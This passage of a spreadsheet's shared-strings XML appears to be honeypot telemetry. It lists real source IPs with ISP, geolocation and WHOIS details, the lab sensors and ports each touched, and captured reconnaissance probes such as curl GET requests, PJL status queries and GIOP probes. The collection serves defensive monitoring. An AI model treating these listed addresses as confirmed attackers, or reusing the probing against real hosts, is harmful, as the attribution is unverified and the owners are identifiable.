    <t>NA&amp;&amp;114-34-15-131.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;62920&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7222:f83</t>
  </si>
  <si>
    <t>9d2bd441c5c09dc7ec18a80827b28d64</t>
  </si>
  <si>
    <t>220.134.68.227</t>
  </si>
  <si>
    <t>220-134-68-227.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22563&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:44e3</t>
  </si>
  <si>
    <t>266275f1178b3a9be59c74600aede287</t>
  </si>
  <si>
    <t>220.132.142.26</t>
  </si>
  <si>
    <t>220-132-142-26.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;50184&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;30587&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:8e1a</t>
  </si>
  <si>
    <t>a60f3526d8b5cbbe3fd114ef09801dd8</t>
  </si>
  <si>
    <t>87.227.112.132</t>
  </si>
  <si>
    <t>c87-227-112-132.bredband.tele2.se&amp;&amp;NA</t>
  </si>
  <si>
    <t>Tele2 Business AB</t>
  </si>
  <si>
    <t>2005-07-06</t>
  </si>
  <si>
    <t>1991-04-14 00:00:00</t>
  </si>
  <si>
    <t>2025-12-31 00:00:00</t>
  </si>
  <si>
    <t>2024-12-01 00:00:00</t>
  </si>
  <si>
    <t>['pitea.dns.swip.net', 'sunic.sunet.se', 'ystad.dns.swip.net', 'c.dns.tele2.net']</t>
  </si>
  <si>
    <t>www.NameSRS.com</t>
  </si>
  <si>
    <t>ok</t>
  </si>
  <si>
    <t>::ffff:57e3:7084</t>
  </si>
  <si>
    <t>c2e84feb64717f5c4c4791bcb8495c49</t>
  </si>
  <si>
    <t>103.87.106.166</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_NTP_H15&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;445&amp;&amp;1080&amp;&amp;53&amp;&amp;443&amp;&amp;80&amp;&amp;389&amp;&amp;123&amp;&amp;1557&amp;&amp;1433</t>
  </si>
  <si>
    <t>Madurai</t>
  </si>
  <si>
    <t>1264521</t>
  </si>
  <si>
    <t>625016</t>
  </si>
  <si>
    <t>9.93593</t>
  </si>
  <si>
    <t>78.0968</t>
  </si>
  <si>
    <t>141314</t>
  </si>
  <si>
    <t>Wi5 Internet Services Private Limited</t>
  </si>
  <si>
    <t>Wi5  Private Limited</t>
  </si>
  <si>
    <t>2017-03-07</t>
  </si>
  <si>
    <t>WI5INTERNET</t>
  </si>
  <si>
    <t>None&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:6757:6aa6</t>
  </si>
  <si>
    <t>77abe42838addcca7e91b6b9f85e237e</t>
  </si>
  <si>
    <t>117.203.200.57</t>
  </si>
  <si>
    <t>::ffff:75cb:c839</t>
  </si>
  <si>
    <t>4777e6d9a1af9cb88b3dac913b039fcb</t>
  </si>
  <si>
    <t>81.178.180.8</t>
  </si>
  <si>
    <t>NA&amp;&amp;host-81-178-180-8.as13285.net</t>
  </si>
  <si>
    <t>Warwickshire</t>
  </si>
  <si>
    <t>Southam</t>
  </si>
  <si>
    <t>2637488</t>
  </si>
  <si>
    <t>52.2527</t>
  </si>
  <si>
    <t>-1.3884</t>
  </si>
  <si>
    <t>2003-01-29</t>
  </si>
  <si>
    <t>2007-05-17 08:57:53</t>
  </si>
  <si>
    <t>2025-05-17 08:57:53</t>
  </si>
  <si>
    <t>2024-05-13 05:12:38</t>
  </si>
  <si>
    <t>['DS0.OPALTELECOM.NET', 'DS1.OPALTELECOM.NET', 'DS2.OPALTELECOM.NET']</t>
  </si>
  <si>
    <t>['domainabuse@cscglobal.com', 'domains@talktalkplc.com']</t>
  </si>
  <si>
    <t>Soapworks,Ordsall Lane</t>
  </si>
  <si>
    <t>::ffff:51b2:b408</t>
  </si>
  <si>
    <t>868530931f9816809a9dbce330c8150c</t>
  </si>
  <si>
    <t>117.207.170.230</t>
  </si>
  <si>
    <t>::ffff:75cf:aae6</t>
  </si>
  <si>
    <t>805e0813cd64f4ee9b9a2c0dd9f78c42</t>
  </si>
  <si>
    <t>117.221.217.107</t>
  </si>
  <si>
    <t>::ffff:75dd:d96b</t>
  </si>
  <si>
    <t>b8cdee1d9cf816e76f31f480b9832427</t>
  </si>
  <si>
    <t>78.187.234.137</t>
  </si>
  <si>
    <t>Diyarbakır Province</t>
  </si>
  <si>
    <t>Diyarbakır</t>
  </si>
  <si>
    <t>316541</t>
  </si>
  <si>
    <t>37.925</t>
  </si>
  <si>
    <t>40.211</t>
  </si>
  <si>
    <t>2007-05-01</t>
  </si>
  <si>
    <t>::ffff:4ebb:ea89</t>
  </si>
  <si>
    <t>02451086b9d6ab8ffacc5210a939a6bc</t>
  </si>
  <si>
    <t>165.154.205.155</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_PJL_H41&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_MSSQL_H21&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_RDP_H47</t>
  </si>
  <si>
    <t>5900&amp;&amp;1080&amp;&amp;9100&amp;&amp;143&amp;&amp;21&amp;&amp;1433&amp;&amp;110&amp;&amp;5432&amp;&amp;6667&amp;&amp;443&amp;&amp;6379&amp;&amp;445&amp;&amp;1521&amp;&amp;389&amp;&amp;3389&amp;&amp;3306</t>
  </si>
  <si>
    <t>{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;login&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 103.211.202.140:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 156.244.37.11:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (165.154.205.155,11986)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}</t>
  </si>
  <si>
    <t>::ffff:a59a:cd9b</t>
  </si>
  <si>
    <t>23bb4e9f75a54e8048b175c35185016f</t>
  </si>
  <si>
    <t>60.49.100.208</t>
  </si>
  <si>
    <t>ADSL-STREAMYX</t>
  </si>
  <si>
    <t>::ffff:3c31:64d0</t>
  </si>
  <si>
    <t>10d9b47f8390b678727b66d04fa94f2a</t>
  </si>
  <si>
    <t>220.134.212.125</t>
  </si>
  <si>
    <t>220-134-212-125.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc86:d47d</t>
  </si>
  <si>
    <t>febc337bcbab31159a1d7b68dd56673b</t>
  </si>
  <si>
    <t>220.134.161.76</t>
  </si>
  <si>
    <t>220-134-161-76.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;22310&amp;&amp;45259&amp;&amp;23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>::ffff:dc86:a14c</t>
  </si>
  <si>
    <t>f608fde24741ba9ec261cda1a85147c4</t>
  </si>
  <si>
    <t>117.207.249.192</t>
  </si>
  <si>
    <t>::ffff:75cf:f9c0</t>
  </si>
  <si>
    <t>4e22051e08b738f5b8ff70dec016d781</t>
  </si>
  <si>
    <t>186.192.216.27</t>
  </si>
  <si>
    <t>Espumoso</t>
  </si>
  <si>
    <t>3463916</t>
  </si>
  <si>
    <t>-28.7247</t>
  </si>
  <si>
    <t>-52.8497</t>
  </si>
  <si>
    <t>28343</t>
  </si>
  <si>
    <t>UNIFIQUE TELECOMUNICACOES S/A</t>
  </si>
  <si>
    <t>Proserver Telecomunicacoes S.A.</t>
  </si>
  <si>
    <t>Proserver Telecomunicacoes S.A</t>
  </si>
  <si>
    <t>::ffff:bac0:d81b</t>
  </si>
  <si>
    <t>5ef1b1a858f693573ce30fc163df33ab</t>
  </si>
  <si>
    <t>117.210.182.227</t>
  </si>
  <si>
    <t>::ffff:75d2:b6e3</t>
  </si>
  <si>
    <t>f38a2a032da565b6f6663526107009c9</t>
  </si>
  <si>
    <t>117.216.157.185</t>
  </si>
  <si>
    <t>::ffff:75d8:9db9</t>
  </si>
  <si>
    <t>5ffe9e84d780c68c82efb9099dd8afcb</t>
  </si>
  <si>
    <t>167.61.153.181</t>
  </si>
  <si>
    <t>NA&amp;&amp;r167-61-153-181.dialup.adsl.anteldata.net.uy</t>
  </si>
  <si>
    <t>Montevideo Department</t>
  </si>
  <si>
    <t>Municipio B</t>
  </si>
  <si>
    <t>Montevideo</t>
  </si>
  <si>
    <t>3441575</t>
  </si>
  <si>
    <t>-34.9033</t>
  </si>
  <si>
    <t>-56.1882</t>
  </si>
  <si>
    <t>::ffff:a73d:99b5</t>
  </si>
  <si>
    <t>9aa567b8a836c83732e0a79b10fa9f72</t>
  </si>
  <si>
    <t>48.217.87.201</t>
  </si>
  <si>
    <t>3306&amp;&amp;NA&amp;&amp;6667</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;NA&amp;&amp;command</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;NA&amp;&amp;{Data_IRC:{'command': 'MGLNDD_154.26.156.60_6667', 'params': '[]', 'prefix': ''}}</t>
  </si>
  <si>
    <t>::ffff:30d9:57c9</t>
  </si>
  <si>
    <t>2205adf15058b64f2865e288eba065e0</t>
  </si>
  <si>
    <t>114.35.19.181</t>
  </si>
  <si>
    <t>114-35-19-181.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_HTTP_H31&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_IPP_H29&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;445&amp;&amp;80&amp;&amp;22&amp;&amp;9100&amp;&amp;631&amp;&amp;389&amp;&amp;5900&amp;&amp;1080&amp;&amp;443&amp;&amp;28427&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:13b5</t>
  </si>
  <si>
    <t>47d667765628660ea1f83aabac0f8b54</t>
  </si>
  <si>
    <t>185.181.41.111</t>
  </si>
  <si>
    <t>DR</t>
  </si>
  <si>
    <t>Drochia</t>
  </si>
  <si>
    <t>618370</t>
  </si>
  <si>
    <t>MD-5216</t>
  </si>
  <si>
    <t>48.0318</t>
  </si>
  <si>
    <t>27.8183</t>
  </si>
  <si>
    <t>62013</t>
  </si>
  <si>
    <t>Societatea Comerciala Click-COM SRL</t>
  </si>
  <si>
    <t>::ffff:b9b5:296f</t>
  </si>
  <si>
    <t>bef4d76d6904af18b082aa0cb4bfdea5</t>
  </si>
  <si>
    <t>60.198.66.207</t>
  </si>
  <si>
    <t>NA&amp;&amp;60-198-66-207.dynamic.tfn.net.tw</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>23&amp;&amp;35906&amp;&amp;35917&amp;&amp;39657&amp;&amp;11847&amp;&amp;34725&amp;&amp;34761&amp;&amp;34780&amp;&amp;34790&amp;&amp;34811&amp;&amp;NA&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3cc6:42cf</t>
  </si>
  <si>
    <t>cd61a54759191f195f72ee1aec7d5b3e</t>
  </si>
  <si>
    <t>78.188.109.143</t>
  </si>
  <si>
    <t>::ffff:4ebc:6d8f</t>
  </si>
  <si>
    <t>a120aae4ea6ecde572b60a66c2ce3fe5</t>
  </si>
  <si>
    <t>114.33.78.11</t>
  </si>
  <si>
    <t>114-33-78-11.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;15774&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7221:4e0b</t>
  </si>
  <si>
    <t>8d401d84e776523e4171881f0312a82d</t>
  </si>
  <si>
    <t>177.223.95.228</t>
  </si>
  <si>
    <t>Nova Cruz</t>
  </si>
  <si>
    <t>3393876</t>
  </si>
  <si>
    <t>-6.47806</t>
  </si>
  <si>
    <t>-35.4339</t>
  </si>
  <si>
    <t>52562</t>
  </si>
  <si>
    <t>INTELNET SERVICO DE MULTIMIDIA LTDA</t>
  </si>
  <si>
    <t>Intelnet Servico De Multimidia Ltda</t>
  </si>
  <si>
    <t>::ffff:b1df:5fe4</t>
  </si>
  <si>
    <t>5948d53f515986267d31905fd44a4e6f</t>
  </si>
  <si>
    <t>125.229.114.24</t>
  </si>
  <si>
    <t>125-229-114-24.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_NTP_H27&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
